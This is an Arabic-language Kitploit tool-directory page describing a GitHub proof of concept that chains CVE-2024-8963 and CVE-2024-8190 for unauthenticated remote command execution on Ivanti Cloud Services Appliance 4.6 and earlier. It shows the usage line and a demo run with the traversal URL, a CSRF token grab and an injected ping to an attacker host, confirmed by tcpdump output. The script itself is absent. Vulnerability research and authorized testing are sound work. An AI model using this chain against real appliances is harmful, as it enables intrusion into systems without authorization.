Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-8190-unauth — الجمع بين CVE-2024-8963 و CVE-2024-8190 - من أجل RCE غير مُوثَّق على Ivanti CSA 4.6 وما دونها | Kitploit
أدوات/GitHubGitHub/flyingllama87/cve-2024-8190-unauth
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubflyingllama87/cve-2024-8190-unauth

CVE-2024-8190-unauth

الجمع بين CVE-2024-8963 و CVE-2024-8190 - من أجل RCE غير مُوثَّق على Ivanti CSA 4.6 وما دونها

عرض المستودع
211منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-8190 غير مصادق عليه

الوصف

دمج CVE-2024-8963 & CVE-2024-8190 - إثبات المفهوم (PoC) لتنفيذ الأوامر عن بعد (RCE) بدون مصادقة على Ivanti CSA 4.6 والإصدارات الأقل.

CVE-2024-8963

ثغرة اجتياز المسار (Path Traversal) في Ivanti CSA قبل الإصدار 4.6 Patch 519 تسمح لمهاجم عن بعد غير مصادق عليه بالوصول إلى وظائف مقيدة.

CVE-2024-8190

ثغرة حقن أوامر نظام التشغيل (OS command injection) في Ivanti Cloud Services Appliance الإصدارات 4.6 Patch 518 وما قبل تسمح لمهاجم عن بعد مصادق عليه بالحصول على تنفيذ الأوامر عن بعد. يجب أن يتمتع المهاجم بامتيازات مستوى المسؤول لاستغلال هذه الثغرة.

يجمع إثبات المفهوم هذا بين الثغرتين لتوضيح كيف يمكن استخدام CVE-2024-8190 بدون مصادقة.

الاستخدام

root@kitploit:~
python3 ./cve-2024-8190.py <target_url> '<CMD>'

عرض توضيحي

root@kitploit:~
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] WARNING: This script is for authorized testing and educational purposes only. Unauthorized use is illegal.
[*] Fetching https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] Got LDCSA_CSRF value: sid:483045<REMOVED>
[*] Sending payload...
[!] Request timed out. Check if the command executed on the target.

الرد

root@kitploit:~
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64

شكر وتقدير

إثبات المفهوم لـ CVE-2024-8190 من Horizon3.ai الذي تم بناء هذا العمل عليه بشكل كبير:
https://github.com/horizon3ai/CVE-2024-8190

قالب nuclei من ProjectDiscovery لـ CVE-2024-8963.yaml:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml

ملاحظة: ProjectDiscovery رائعة!

إخلاء مسؤولية

لا تكن أحمقاً.

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحة. القائمون على المشروع غير مسؤولين عن إساءة استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة